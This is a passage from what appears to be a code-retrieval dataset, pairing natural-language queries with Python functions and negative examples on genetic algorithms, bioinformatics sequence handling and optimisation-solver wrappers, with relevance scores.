i, (c, lo, hi) in enumerate(zip(candidate, bounder.lower_bound, bounder.upper_bound)):\r\n if random.random() <= 0.5:\r\n new_value = c + (hi - c) * (1.0 - random.random() ** exponent)\r\n else:\r\n new_value = c - (c - lo) * (1.0 - random.random() ** exponent)\r\n mutant[i] = new_value\r\n return mutant", "def mutate(self, child):\n for i in range(0, self.chromosome_length):\n if random.randint(1, 100) <= self.mutation_chance:\n child[i] = self.random_gene()\n return child", "def getdviolvar(self,whichsol_,sub,viol): # 3\n if not isinstance(whichsol_,soltype): raise TypeError(\"Argument whichsol has wrong type\")\n num_ = None\n if num_ is None:\n num_ = len(sub)\n elif num_ != len(sub):\n raise IndexError(\"Inconsistent length of array sub\")\n if num_ is None: num_ = 0\n if sub is None: raise TypeError(\"Invalid type for argument sub\")\n if sub is None:\n sub_ = None\n else:\n try:\n sub_ = memoryview(sub)\n except TypeError:\n try:\n _tmparr_sub = array.array(\"i\",sub)\n except TypeError:\n raise TypeError(\"Argument sub has wrong type\")\n else:\n sub_ = memoryview(_tmparr_sub)\n \n else:\n if sub_.format != \"i\":\n sub_ = memoryview(array.array(\"i\",sub))\n \n if viol is None: raise TypeError(\"Invalid type for argument viol\")\n _copyback_viol = False\n if viol is None:\n viol_ = None\n else:\n try:\n viol_ = memoryview(viol)\n except TypeError:\n try:\n _tmparr_viol = array.array(\"d\",viol)\n except TypeError:\n raise TypeError(\"Argument viol has wrong type\")\n else:\n viol_ = memoryview(_tmparr_viol)\n _copyback_viol = True\n else:\n if viol_.format != \"d\":\n viol_ = memoryview(array.array(\"d\",viol))\n _copyback_viol = True\n if viol_ is not None and len(viol_) != (num_):\n raise ValueError(\"Array argument viol has wrong length\")\n res = self.__obj.getdviolvar(whichsol_,num_,sub_,viol_)\n if res != 0:\n result,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n if _copyback_viol:\n viol[:] = _tmparr_viol", "def variants(self, phrase: Union[str, Phrase]) -> Union[None, List[Phrase]]:\n phrase_string = phrase.phrase_string if isinstance(phrase, Phrase) else phrase\n if phrase_string not in self.has_variants:\n return None\n else:\n return [self.variant_index[variant_string] for variant_string in self.has_variants[phrase_string]]", "def mutatation(self, indiv: Tour) -> Tour:\n n = indiv.size()\n for i in range(n):\n if random.random() < self.mutation_rate:\n j = int(random.random() * n)\n\n # Swap 2 genes (cities)\n indiv.tour_ids[i], indiv.tour_ids[j] = indiv.tour_ids[j], indiv.tour_ids[i]\n\n # Update fitness\n indiv.compute_fitness(self.map.get())\n return indiv", "def test_get_subalignment_sequence_order_maintained(self):\n result = AlignedSeq.get_sub_alignment_by_list_id([\"s3\", \"s1\"], self.alignment)\n expected = MultipleSeqAlignment([self.alignment[0], self.alignment[2]])\n self.assertTrue(msas_equal(expected, result))", "def mutation(population):\r\n global decryption_key\r\n\r\n bases = ['A', 'C', 'G', 'T']\r\n alter_dna_table = alter_dna_bases(bases)\r\n\r\n decryption_key += mutation_table_del + str(alter_dna_table) + mutation_table_del\r\n\r\n new_population = []\r\n for chromosome in population:\r\n decryption_key += chromosome_del\r\n\r\n # apply the complement\r\n b_chromosome = dna_to_bits(chromosome, utils.dna_base_to_two_bits_table)\r\n decryption_key += complement_mutation_del\r\n point1 = random.randint(0, len(b_chromosome) - 1)\r\n point2 = random.randint(point1, len(b_chromosome) - 1)\r\n decryption_key += \"(%s, %s)\" % (point1, point2)\r\n decryption_key += complement_mutation_del\r\n b_chromosome = complement(b_chromosome, point1, point2)\r\n\r\n # convert each 4 bits in chromosome to two dna bases using four_bits_to_two_dna_base_table\r\n four_bits_vector = group_bits(b_chromosome, 4)\r\n\r\n last_dna_base = None\r\n # if the last element is of length 2, don't convert it\r\n if len(four_bits_vector[len(four_bits_vector) - 1]) == 2:\r\n last_dna_base = utils.two_bits_to_dna_base_table[four_bits_vector[len(four_bits_vector) - 1]]\r\n\r\n # convert only the 4 bits elements\r\n four_bits_vector = four_bits_vector[:-1]\r\n\r\n dna_seq = bits_to_dna(four_bits_vector, utils.four_bits_to_two_dna_base_table)\r\n if last_dna_base is not None:\r\n dna_seq += last_dna_base\r\n\r\n # and then alter the dna bases between point1 and point2\r\n decryption_key += alter_mutation_del\r\n point1 = random.randint(0, len(dna_seq) - 1)\r\n point2 = random.randint(point1, len(dna_seq) - 1)\r\n decryption_key += \"(%s, %s)\" % (point1, point2)\r\n decryption_key += alter_mutation_del\r\n new_chromosome = \"\"\r\n for i in range(len(dna_seq)):\r\n if i >= point1 and i <= point2:\r\n new_chromosome += alter_dna_table[dna_seq[i]]\r\n else:\r\n new_chromosome += dna_seq[i]\r\n\r\n new_population.append(new_chromosome)\r\n\r\n decryption_key += chromosome_del\r\n\r\n return new_population", "def sample_from_subpop(instance, params, subpop):\n y = subpop\n x = np.random.choice([-1,+1], size=params['d'])\n x[instance['indices'][subpop]] = instance['values'][subpop]\n return x, y, subpop", "def _get_biallelic_variant(self, variant, info, _check_alleles=True):\n info = info.iloc[0, :]\n assert not info.multiallelic\n\n # Seeking and parsing the file\n self._impute2_file.seek(info.seek)\n genotypes = self._parse_impute2_line(self._impute2_file.readline())\n\n variant_alleles = variant._encode_alleles([\n genotypes.reference, genotypes.coded,\n ])\n if (_check_alleles and variant_alleles != variant.alleles):\n # Variant with requested alleles is unavailable.\n logging.variant_not_found(variant)\n return []\n\n return [genotypes]", "def mutate_random(self, n=1):\n mutated_dna = self._dna\n for i in range(n):\n mutated_dna = mutate(mutated_dna)\n return Gene(mutated_dna, self._exon_regions)", "def dna(self):\n return self.seq.replace('U', 'T').replace('u', 't')", "def siblinghood_sim_partial(siblinghood_1, siblinghood_2):\n return SubstructureAgreement.substructure_sim_partial(siblinghood_1, siblinghood_2)", "def grch38_braf_genom_silent_mutation():\n params = {\n \"id\": \"normalize.variation:NC_000007.13%3Ag.140453136%3D\",\n \"type\": \"VariationDescriptor\",\n \"variation_id\": \"ga4gh:VA.aMwnr5rEbtPQe5gXDDO2gZO_zSqN2RmH\",\n \"variation\": {\n \"_id\": \"ga4gh:VA.aMwnr5rEbtPQe5gXDDO2gZO_zSqN2RmH\",\n \"location\": {\n \"_id\": \"ga4gh:VSL.zga82-TpYiNmBESCfvDvAz9DyvJF98I-\",\n \"interval\": {\n \"end\": {\"value\": 140753336, \"type\": \"Number\"},\n \"start\": {\"value\": 140753335, \"type\": \"Number\"},\n \"type\": \"SequenceInterval\"\n },\n \"sequence_id\": \"ga4gh:SQ.F-LrLMe1SRpfUZHkQmvkVKFEGaoDeHul\",\n \"type\": \"SequenceLocation\"\n },\n \"state\": {\n \"sequence\": \"A\",\n \"type\": \"LiteralSequenceExpression\"\n },\n \"type\": \"Allele\"\n },\n \"molecule_context\": \"genomic\",\n \"structural_type\": \"SO:0002073\",\n \"vrs_ref_allele_seq\": \"A\"\n }\n return VariationDescriptor(**params)", "def indel_of_nucl(\n SNPSeq, ID,\n INDEL_arr, OGSeq\n ):\n\n # intialize holders for coordinate (COORD), type (TYPE), modified nucleotide (MOD), and IndelSNPSeq\n COORD = ''\n TYPE = ''\n MOD = ''\n IndelSNPSeq = ''\n\n # initialize counter for how many total nucleotides have been removed or deleted\n indelCNT = 0\n\n # if there are indels, modify the sequence accordingly\n if len(INDEL_arr) > 0:\n # loop through indel mutations and modify the sequence accordingly\n for indel in INDEL_arr:\n\n # assign coordinate (COORD), old nucleotide (OLD), and new/snp nucleotide (NEW)\n COORD = indel[1]\n TYPE = indel[2]\n MOD = indel[3]\n COORD = int(COORD)-1+indelCNT\n\n # if a deletion check that the nucleotide matches\n if TYPE == '-':\n # check if coordinate matches the old nucleotide\n if SNPSeq[COORD] == SNPSeq[COORD+len(MOD)]: \n # populate indelSNPSeq with SNPSeq without the MOD nucleotide \n IndelSNPSeq = SNPSeq[:COORD] + SNPSeq[COORD + 1:]\n # reset SNPSeq to be the new nucleotide sequence\n SNPSeq = IndelSNPSeq\n # subtract length of MOD sequence\n indelCNT=indelCNT-len(MOD)\n else:\n print(SNPSeq[(COORD):(COORD+2)])\n print(\"\\nPosition\", COORD+1, \"is a\", SNPSeq[COORD], \"and not a\", MOD)\n print(\"Check that the correct position has been specified\\n\")\n sys.exit()\n\n # if a deletion check that the nucleotide matches\n elif TYPE == '+':\n # populate indelSNPSeq with SNPSeq without the MOD nucleotide \n IndelSNPSeq = SNPSeq[:COORD+1] + MOD + SNPSeq[COORD + 1:]\n # reset SNPSeq to be the new nucleotide sequence\n SNPSeq = IndelSNPSeq\n # add length of MOD sequence\n indelCNT=indelCNT+len(MOD)\n\n # pass to print_results function\n print_results(\n ID, IndelSNPSeq, OGSeq\n )\n\n # if there are no indels, pass to print_results function\n elif len(INDEL_arr) == 0:\n IndelSNPSeq = SNPSeq\n # pass to print_results\n print_results(\n ID, IndelSNPSeq, OGSeq\n )", "def get_variant_by_name(self, name, variant_info=None):\n # From 1.3.2 onwards, PyPlink sets unique names.\n if not self.has_index:\n raise NotImplementedError(\"Not implemented when IMPUTE2 file is \"\n \"not indexed (see genipe)\")\n\n # Getting the seek position\n if variant_info is None:\n try:\n variant_info = self._impute2_index.loc[name, :]\n\n except KeyError:\n if name in self.get_duplicated_markers():\n # The variant is a duplicated one, so we go through all the\n # variants with the same name and the :dupx suffix\n return [\n self.get_variant_by_name(dup_name).pop()\n for dup_name in self.get_duplicated_markers()[name]\n ]\n\n else:\n # The variant is not in the index\n logging.variant_name_not_found(name)\n return []\n\n # Seeking to the right place in the file\n self._impute2_file.seek(variant_info.seek)\n\n # Parsing the file\n genotypes = self._parse_impute2_line(self._impute2_file.readline())\n\n # Fixing the object\n self._fix_genotypes_object(genotypes, variant_info)\n\n return [genotypes]", "def getSequence( self,\n contig, \n strand = \"+\", \n start = 0, \n end = 0,\n converter = None,\n as_array = False):\n\n if not self.mIsLoaded: self.__loadIndex()\n\n if contig in self.mSynonyms:\n contig = self.mSynonyms[contig]\n\n if contig not in self.mIndex:\n raise KeyError, \"%s not in index\" % contig\n\n data = self.mIndex[contig]\n # dummy is\n # -> pos_seq for seekable streams\n # -> block_size for unseekable streams\n pos_id, dummy, lsequence = data[:3]\n pos_seq = dummy\n block_size = dummy\n \n if end == 0: end = lsequence\n \n if end > lsequence:\n raise ValueError(\"3' coordinate on %s out of bounds: %i > %i\" % (contig, end, lsequence))\n if start < 0:\n raise ValueError(\"5' coordinate on %s out of bounds: %i < 0\" % (contig, start))\n\n if converter:\n first_pos, last_pos = converter( start, end,\n str(strand) in (\"+\", \"1\"),\n lsequence )\n else:\n first_pos, last_pos = start, end\n if str(strand) in (\"-\", \"0\", \"-1\"):\n first_pos, last_pos = lsequence - last_pos, lsequence - first_pos\n \n assert( first_pos < last_pos )\n \n p = SArray( \"c\" )\n \n if self.mNoSeek:\n ## read directly from position\n p.fromstring( self.mDatabaseFile.read( block_size, data[3], first_pos, last_pos) )\n else:\n first_pos += pos_seq\n last_pos += pos_seq\n\n self.mDatabaseFile.seek( first_pos )\n p.fromstring( self.mDatabaseFile.read( last_pos - first_pos ) )\n\n if str(strand) in (\"-\", \"0\", \"-1\"):\n p.reverse() \n p = SArray(\"c\",\n string.translate( p[:],\n string.maketrans(\"ACGTacgt\", \"TGCAtgca\") ) )\n\n if as_array:\n return p\n else:\n # cast to string\n return p[:]", "def get_fragment(genome, chr, slen, spos):\n \n return genome[chr][spos:spos+slen]", "def getMutation(AA,Codon):\r\n temp_mutationlist = []\r\n '''create a list of possible triplets within hamming distance 1 '''\r\n for item in INI.genetic_code.keys():\r\n isvalid = INI.isvalidtriplet(item,Codon)\r\n ''' Hamming distance 1, AA is not equal to the given AA,forbid mutation to stopcodon '''\r\n if (isvalid == True and AA !=INI.genetic_code[item] and INI.genetic_code[item]!=\"*\"):\r\n temp_mutationlist.append(item)\r\n \r\n \r\n aalist = []\r\n # generate a list of all possible amino acids resulting from the temp_mutationlist \r\n for item in temp_mutationlist:\r\n if (item in INI.genetic_code):\r\n aalist.append(INI.genetic_code[item])\r\n else:\r\n aalist.append(\"n\")\r\n \r\n return(temp_mutationlist,aalist)", "def parse(v, cpy):\n if v.samples[0]['GT'][cpy] == 0: # Not present in this copy\n return None\n alt = v.samples[0].alleles[cpy]\n l_r, l_a = len(v.ref), len(alt)\n if l_r == 1:\n if l_a == 1:\n op, op_len = 'X', 0\n else:\n op, op_len = 'I', l_a - l_r\n elif l_a == 1:\n op, op_len = 'D', l_r - l_a\n else:\n raise ValueError(\"Complex variants present in VCF. Please filter or refactor these.\")\n\n return Variant(v.pos, v.ref, v.samples[0].alleles[cpy], op, op_len)", "def mutation_sample_dispatch(\n ggrp_target: GenomeGroupTarget,\n ggrp: GenomeGroup,\n test_cmds: List[str],\n config: Config,\n trial_runner: TRIAL_RUNNER_TYPE,\n) -> List[MutantTrialResult]:\n\n # Select the valid mutations for the ggrp_target.loc_idx (sample)\n # Then apply the selected mutations in a random order running the test commands\n # until all mutations are tested or the appropriate break-on action occurs\n results: List[MutantTrialResult] = []\n\n LOGGER.info(\n \"Current target location: %s, %s\", ggrp_target.source_path.name, ggrp_target.loc_idx\n )\n\n op_code = CATEGORIES[ggrp_target.loc_idx.ast_class]\n mutant_operations = CategoryCodeFilter(codes=(op_code,)).valid_mutations\n\n LOGGER.debug(\"MUTATION OPS: %s\", mutant_operations)\n LOGGER.debug(\"MUTATION: %s\", ggrp_target.loc_idx)\n mutant_operations.remove(ggrp_target.loc_idx.op_type)\n\n while mutant_operations:\n # random.choice doesn't support sets, but sample of 1 produces a list with one element\n current_mutation = random.sample(mutant_operations, k=1)[0]\n mutant_operations.remove(current_mutation)\n\n trial_results = trial_runner(\n ggrp[ggrp_target.source_path],\n ggrp_target.loc_idx,\n current_mutation,\n test_cmds,\n config.max_runtime,\n )\n\n results.append(trial_results)\n\n # will log output results to console, and flag to break while loop of operations\n if trial_output_check_break(\n trial_results, config, ggrp_target.source_path, ggrp_target.loc_idx\n ):\n break\n\n return results", "def create_dna_mutation_coin(s):\n p = [P_MUTATE_DNA_00, P_MUTATE_DNA_1, P_MUTATE_DNA_11]\n return BiasedCoin(p[s])", "def get_aa_mut_info(coding_pos, somatic_base, gene_seq):\n # if no mutations return empty result\n if not somatic_base:\n aa_info = {'Reference Codon': [],\n 'Somatic Codon': [],\n 'Codon Pos': [],\n 'Reference Nuc': [],\n 'Reference AA': [],\n 'Somatic AA': []}\n return aa_info\n\n # get codon information into three lists\n ref_codon, codon_pos, pos_in_codon, ref_nuc = zip(*[cutils.pos_to_codon(gene_seq, p)\n for p in coding_pos])\n ref_codon, codon_pos, pos_in_codon, ref_nuc = list(ref_codon), list(codon_pos), list(pos_in_codon), list(ref_nuc)\n\n # construct codons for mutations\n mut_codon = [(list(x) if x != 'Splice_Site' else []) for x in ref_codon]\n for i in range(len(mut_codon)):\n # splice site mutations are not in a codon, so skip such mutations to\n # prevent an error\n if pos_in_codon[i] is not None:\n pc = pos_in_codon[i]\n mut_codon[i][pc] = somatic_base[i]\n mut_codon = [(''.join(x) if x else 'Splice_Site') for x in mut_codon]\n\n # output resulting info\n aa_info = {'Reference Codon': ref_codon,\n 'Somatic Codon': mut_codon,\n 'Codon Pos': codon_pos,\n 'Reference Nuc': ref_nuc,\n 'Reference AA': [(utils.codon_table[r] if (r in utils.codon_table) else None)\n for r in ref_codon],\n 'Somatic AA': [(utils.codon_table[s] if (s in utils.codon_table) else None)\n for s in mut_codon]}\n\n return aa_info", "def mutate(self, number_of_mutations):\n self.mutated.clear()\n mutations = []\n for i in range(number_of_mutations+1):\n old_gene = random.choice(self.genes)\n while old_gene in mutations:\n old_gene = random.choice(self.genes)\n # print(self.max_time)\n old_gene.start_time = random.choice(range(self.max_time - old_gene.finish))\n self.mutated.append(self.genes.index(old_gene))", "def perturbation(solution):\n solution = deepcopy(solution)\n\n chosen_index = randint(0, len(solution) - 1)\n\n sub_sequence = solution[chosen_index]\n sub_index = randint(0, len(sub_sequence) - 2)\n sub_sequence[sub_index], sub_sequence[sub_index + 1] = sub_sequence[sub_index + 1], sub_sequence[sub_index]\n\n solution[chosen_index] = sub_sequence\n\n return solution", "def _get_permutated_segments_indices(\n self, randomized: bool, random_state: Optional[np.random.mtrand.RandomState]\n ) -> np.ndarray:\n idx = np.arange(self.dy.size)\n\n if randomized:\n if random_state is None:\n random_state = np.random.RandomState()\n idx = random_state.permutation(idx)\n return idx", "def generateSubSequences(k, ch):\n seq = [\"\".join(c) for c in itertools.product(ch, repeat = k)]\n# discussion about the best way to do this:\n# https://stackoverflow.com/questions/7074051/what-is-the-best-way-to-generate-all-possible-three-letter-strings\n return seq", "def getdviolvar(self,whichsol_,sub_,viol_):\n num_ = None\n if num_ is None:\n num_ = len(sub_)\n elif num_ != len(sub_):\n raise IndexError(\"Inconsistent length of array sub\")\n if sub_ is None:\n raise ValueError(\"Argument sub cannot be None\")\n if sub_ is None:\n raise ValueError(\"Argument sub may not be None\")\n if isinstance(sub_, numpy.ndarray) and sub_.dtype is numpy.dtype(numpy.int32) and sub_.flags.contiguous:\n _sub_copyarray = False\n _sub_tmp = ctypes.cast(sub_.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_int32))\n elif sub_ is not None:\n _sub_copyarray = True\n _sub_np_tmp = numpy.zeros(len(sub_),numpy.dtype(numpy.int32))\n _sub_np_tmp[:] = sub_\n assert _sub_np_tmp.flags.contiguous\n _sub_tmp = ctypes.cast(_sub_np_tmp.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_int32))\n else:\n _sub_copyarray = False\n _sub_tmp = None\n \n _viol_minlength = (num_)\n if (num_) > 0 and viol_ is not None and len(viol_) != (num_):\n raise ValueError(\"Array argument viol is not long enough: Is %d, expected %d\" % (len(viol_),(num_)))\n if isinstance(viol_,numpy.ndarray) and not viol_.flags.writeable:\n raise ValueError(\"Argument viol must be writable\")\n if viol_ is None:\n raise ValueError(\"Argument viol may not be None\")\n if isinstance(viol_, numpy.ndarray) and viol_.dtype is numpy.dtype(numpy.float64) and viol_.flags.contiguous:\n _viol_copyarray = False\n _viol_tmp = ctypes.cast(viol_.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_double))\n elif viol_ is not None:\n _viol_copyarray = True\n _viol_np_tmp = numpy.zeros(len(viol_),numpy.dtype(numpy.float64))\n _viol_np_tmp[:] = viol_\n assert _viol_np_tmp.flags.contiguous\n _viol_tmp = ctypes.cast(_viol_np_tmp.ctypes._as_parameter_,ctypes.POINTER(ctypes.c_double))\n else:\n _viol_copyarray = False\n _viol_tmp = None\n \n res = __library__.MSK_XX_getdviolvar(self.__nativep,whichsol_,num_,_sub_tmp,_viol_tmp)\n if res != 0:\n _,msg = self.__getlasterror(res)\n raise Error(rescode(res),msg)\n if _viol_copyarray:\n viol_[:] = _viol_np_tmp", "def statement(analysis):\n\n #Recovering the subject\n phrase = element_rebuilding.nom_struc_rebuilding(analysis.sn)\n\n if not phrase:\n return []\n\n if analysis.sv:\n #Recovering the end of the sentence\n phrase = element_rebuilding.end_statement_rebuilding(phrase, analysis.sv, analysis.sn, analysis.data_type,\n analysis.aim)\n\n #Recovering subsentences\n for s in analysis.sv[0].vrb_sub_sentence:\n phrase = phrase + sub_process(s)\n\n #Eliminate redundancies if there are\n phrase = other_functions.eliminate_redundancy(phrase)\n\n #If it is a relative form\n if analysis.data_type == RELATIVE or analysis.data_type.startswith(SUBSENTENCE):\n if phrase[len(phrase) - 1][len(phrase[len(phrase) - 1]) - 1] != ',':\n phrase[len(phrase) - 1] += ','\n return phrase\n if analysis.data_type == W_QUESTION:\n return phrase + ['?']\n\n #To take of all not useless comma\n while phrase[len(phrase) - 1][len(phrase[len(phrase) - 1]) - 1] == ',':\n phrase[len(phrase) - 1] = phrase[len(phrase) - 1][:len(phrase[len(phrase) - 1]) - 1]\n return phrase + ['.']", "def __getitem__(self, index):\n result = self.sequence[index]\n return SortedSet(result) if isinstance(index, slice) else result", "def test_selection():\n pdb_inp = iotbx.pdb.input(source_info=None, lines=pdb_answer_0)\n ncs_obj_phil = ncs.input(\n hierarchy=pdb_inp.construct_hierarchy())\n nrg = ncs_obj_phil.get_ncs_restraints_group_list()\n\n m1 = list(nrg[0].master_iselection)\n c1 = list(nrg[0].copies[0].iselection)\n c2 = list(nrg[0].copies[1].iselection)\n\n assert len(m1) == len(c1) # renumbering\n assert m1 == [0, 1, 2, 3, 4, 5, 6] # 0, 1, X, 3, X, 5, X | 0, 1, 3\n assert c1 == [7, 8, 9, 10, 11, 12, 13] # 7, 8, 9, X, X, 12, X | 4, 5, 7\n assert c2 == [14, 15, 16, 17, 18, 19, 20] # 14, 15, X, 17, X, 19, X | 8, 9, 11\n\n selection1 = flex.size_t([0,1,5,3,100,101])\n selection2 = flex.size_t([0,1,5,3,7,8,9,12,100,101])\n selection3 = flex.size_t([0,1,5,3,7,8,9,12,14,15,19,17,100,101])\n # gone iseqs for selection3: 2,4,6,10,11,13,16,18,20-99\n\n new_nrg = nrg.select(flex.bool(102, selection1))\n # only atoms in master are selected\n mt = list(new_nrg[0].master_iselection)\n c1t = list(new_nrg[0].copies[0].iselection)\n\n assert mt == []\n assert c1t == []\n\n # atoms selected in both master and copies\n new_nrg = nrg.select(flex.bool(102, selection2))\n # only atoms in master are selected\n mt = list(new_nrg[0].master_iselection)\n c1t = list(new_nrg[0].copies[0].iselection)\n\n assert mt == []\n assert c1t == []\n\n new_nrg = nrg.select(flex.bool(102, selection3))\n # only atoms in master are selected\n mt = list(new_nrg[0].master_iselection)\n c1t = list(new_nrg[0].copies[0].iselection)\n c2t = list(new_nrg[0].copies[1].iselection)\n\n assert mt == [0, 1, 3], list(mt)\n assert c1t == [4, 5, 7], list(c1t)\n assert c2t == [8, 9, 11], list(c2t)", "def choose_from(seq, random_state):\n return seq[random_state.choice(len(seq))]", "def getSubstitutions(self):\n\n\t\tnative_sequence = self.native.sequence()\n\t\tdesign_sequence = self.design.protein.sequence()\n\n\t\tslist = getSubstitutionPositions(native_sequence, design_sequence)\n\t\twordlist = []\n\t\tfor i in slist:\n\t\t\twordlist.append(str(i))\n\t\t\n\t\tdiff_list = string.join(wordlist, \",\")\n\t\tprint diff_list\n\t\tcmd.select(\"desres\", \"(resi \" + diff_list + \")\")\n\t\tcmd.disable(\"desres\")", "def tournament():\n return min(sample(population, sample_size)).chromosome[:]", "def _single_entity_mutated(self, mut_dat, output, variant, item, translocations, fusions, all_except):\n out_dict = {\"names\": lambda x: list(set(x[self.by[self.version]])), #functions for returning specific data types\n \"dataframe\": lambda x: x,\n \"dict\": lambda x: dict(zip(x[self.by[self.version]], x[variant]))}\n\n return out_dict[output](mut_dat)" ]
[ "0.5627289", "0.5542037", "0.5341807", "0.5279429", "0.49878958", "0.4956177", "0.49556637", "0.49054444", "0.4834147", "0.48148525", "0.47234476", "0.4720456", "0.4699101", "0.46727768", "0.4651557", "0.46446463", "0.46332493", "0.46132207", "0.46070266", "0.45562443", "0.45501533", "0.4549319", "0.45486826", "0.45245928", "0.45029423", "0.4472895", "0.4469311", "0.44639558", "0.4462587", "0.4453186", "0.44164962", "0.44076476", "0.44032097", "0.43920684", "0.43746236", "0.43658155", "0.43437478", "0.4342689", "0.4317373", "0.43126765", "0.4312342", "0.4308765", "0.4303543", "0.4302796", "0.43025362", "0.4295105", "0.42904305", "0.42808285", "0.42754513", "0.42746678", "0.42627794", "0.42551792", "0.42454144", "0.42404816", "0.4233842", "0.42320138", "0.4227196", "0.42095444", "0.420354", "0.4203111", "0.42016366", "0.4198436", "0.4185974", "0.4185649", "0.41833794", "0.41781345", "0.41741514", "0.41645306", "0.41624695", "0.41619068", "0.41526464", "0.41500694", "0.4143477", "0.41429663", "0.41422722", "0.41340333", "0.41323426", "0.41291222", "0.41231522", "0.41199476", "0.4115652", "0.4112559", "0.41105294", "0.41074207", "0.4106553", "0.41045243", "0.41000992", "0.4099894", "0.40972", "0.4084683", "0.40835196", "0.40819612", "0.4080385", "0.40798438", "0.4079341", "0.407046", "0.4068681", "0.40650356", "0.4064786", "0.40539712" ]
0.695729
0
Get the expression adjustment parameter for certain samples.
def get_size_factor(samples, lib_file_path): libs = np.loadtxt(lib_file_path, dtype='str', skiprows=1, delimiter='\t') a, b = np.where(samples[:, np.newaxis] == libs[:, 0]) assert np.all(libs[b, 0] == samples) libs = libs[b, :] med = np.median(libs[:, 1].astype('float')) sf = med / libs[:, 1].astype('float') return sf
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment\")", "def get_parameters(self):\n kwargs = {name: adjuster.get() for name, adjuster in self.adjusters.items()}\n return Parameters(**kwargs)", "def get_parameter_shift(self, idx):\n # get the gradient recipe for this parameter\n recipe = self.grad_recipe[idx]\n # internal multiplier in the Variable\n var_mult = self.params[idx].mult\n\n multiplier = 0.5 if recipe is None else recipe[0]\n multiplier *= var_mult\n shift = np.pi / 2 if recipe is None else recipe[1]\n shift /= var_mult\n return multiplier, shift", "def estimateParameterValues(self, name, rawData):\n observations = np.array([d[0] for d in rawData])\n min = np.nanmin(observations)\n max = np.nanmax(observations)\n delta = max - min\n\n if name == self.parameterNames[0]:\n return oint(min-delta, max+delta, 1000)\n else:\n raise ConfigurationError('Gaussian mean model does not contain a parameter \"{}\".'.format(name))", "def get_measurement_parameter(self, trace: int) -> str:\n if trace not in range(1, 5):\n raise ValueError(\"Trace must be between 1 and 4\")\n\n return self.query(f\"CALC:PAR{trace}:DEF?\")", "def getParam(self):\n return self.__alpha0, self.__alpha1, self.__beta, self.__eta", "def adjust(self):\n if self._adjust is None:\n return \"\"\n return self._adjust", "def estimateParameterValues(self, name, rawData):\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return oint(-1, 1, 200)\n elif name == self.parameterNames[1]:\n return oint(0, 2 * std, 200)\n else:\n raise ConfigurationError('AR1 model does not contain a parameter \"{}\".'.format(name))", "def estimateParameterValues(self, name, rawData):\n std = np.nanstd(np.ravel(rawData))\n\n if name == self.parameterNames[0]:\n return oint(-1, 1, 200)\n elif name == self.parameterNames[1]:\n return oint(0, 2 * std, 200)\n else:\n raise ConfigurationError('AR1 model does not contain a parameter \"{}\".'.format(name))", "def eff_param():\n return r.TF1('photon_eff_param', eff_param_string(), 0, 7)", "def adjustment(self) -> pulumi.Input['GoogleCloudChannelV1RepricingAdjustmentArgs']:\n return pulumi.get(self, \"adjustment\")", "def adjustment(self) -> pulumi.Input['GoogleCloudChannelV1RepricingAdjustmentArgs']:\n return pulumi.get(self, \"adjustment\")", "def get_means_and_scales(self):\n return self.optim.parameters[::2], np.exp(self.optim.parameters[1::2])", "def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment_percentage\")", "def adjustment_percentage(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"adjustment_percentage\")", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"dAfb[0.,-0.75,0.75]\");\n self.modelBuilder.doVar(\"dA0[0.0, -1.0, 1.0]\");\n #self.modelBuilder.doSet(\"POI\",\"dAfb,dA0\")\n self.modelBuilder.doSet(\"POI\",\"dAfb\")\n self.modelBuilder.factory_('expr::mAfb(\"@0+@1\",eAfb,dAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0+@1)\",eA0,dA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n self.modelBuilder.factory_('expr::eNorm(\"3.0/4.0/(2.0+@0)\",eAlph)')\n self.modelBuilder.factory_('expr::eRAlph(\"@0*@1\",eAlph,eNorm)')\n self.modelBuilder.factory_('expr::eRpl(\"(@0+@1)\",eNorm,eAfb)')\n self.modelBuilder.factory_('expr::eRmn(\"(@0-@1)\",eNorm,eAfb)')\n\n self.modelBuilder.factory_('expr::mAlph(\"2.0*@0/(2.0-@0)\",mA0)')\n self.modelBuilder.factory_('expr::mNorm(\"3.0/4.0/(2.0+@0)\",mAlph)')\n self.modelBuilder.factory_('expr::mRAlph(\"@0*@1\",mAlph,mNorm)')\n self.modelBuilder.factory_('expr::mRpl(\"(@0+@1)\",mNorm,mAfb)')\n self.modelBuilder.factory_('expr::mRmn(\"(@0-@1)\",mNorm,mAfb)')", "def doParametersOfInterest(self):\n\n self.modelBuilder.doVar(\"eAfb[0.6,-0.75,0.75]\");\n self.modelBuilder.doVar(\"eA0[0.05, -1.0, 1.0]\");\n self.modelBuilder.doVar(\"rAfb[1.0,-5.0, 5.0]\");\n self.modelBuilder.doVar(\"rA0[1.0, -5.0, 5.0]\");\n self.modelBuilder.doSet(\"POI\",\"rAfb,rA0\")\n self.modelBuilder.factory_('expr::mAfb(\"@0*@1\",eAfb,rAfb)')\n self.modelBuilder.factory_('expr::mA0(\"(@0*@1)\",eA0,rA0)')\n\n \n self.modelBuilder.factory_('expr::eAlph(\"2.0*@0/(2.0-@0)\",eA0)')\n 